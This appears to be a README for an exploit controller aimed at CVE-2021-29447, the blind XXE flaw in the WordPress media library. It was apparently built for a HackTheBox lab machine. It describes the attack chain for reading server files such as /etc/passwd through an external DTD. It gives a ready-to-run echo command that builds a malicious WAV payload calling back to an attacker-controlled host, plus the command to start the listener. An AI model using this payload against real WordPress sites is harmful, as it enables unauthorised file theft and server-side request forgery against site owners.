Arbitrary file read controller based on CVE-2021-29447## Blind XXE controller
I make this controller on doing metatwo machine in HackTheBox to exploiting CVE-2021-29447 which Is a WordPress XXE Vulnerability in Media Library affected version 5.7, 5.6.2, 5.6.1, 5.6, 5.0.11. where an authenticated user with ability to upload media library can upload malicious wav file that could lead to remote arbitrary file read and server side request forgery (SSRF)
To exploit these vulnerabilitie, it takes multiple steps to complete a successful attack.That is the result of parsed iXML metadata is not sent back to the user, so to exploit it we need a blind XXE payload. This is doable by including an external Document Type Definition DTD controlled by the attacker and we need to created the malicious wav file for getting back the connection on attacker listening server. Once we done these steps upload the wav file to server wait for receives an HTTP request that includes the base64 encoded content of our payload file eg: /etc/passwd and decode the base64. This controller has all solutions for these multiple steps. You only need type the filename on the controller **$console >**
Detailed blog [https://blog.sonarsource.com/wordpress-xxe-security-vulnerability/](https://blog.sonarsource.com/wordpress-xxe-security-vulnerability/)
Note: This controller is fully configured to HTB metatwo machine. Any outside use you need too make some changes in scripts
### Usage
Create a wave file named **payload.wav**
```bash
echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://YOUR_IP:8000/evil.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav
```
run **main.py**
```bash
python3 main.py listen_ip
```
#### POC image
[4.0K] /data/pocs/55961006fa1b807515c472030622ca234b2753ce
├── [1.7K] controller.py
├── [1.1K] listener.py
├── [ 668] main.py
├── [4.0K] poc
│ └── [193K] poc.png
└── [1.7K] README.md
1 directory, 5 files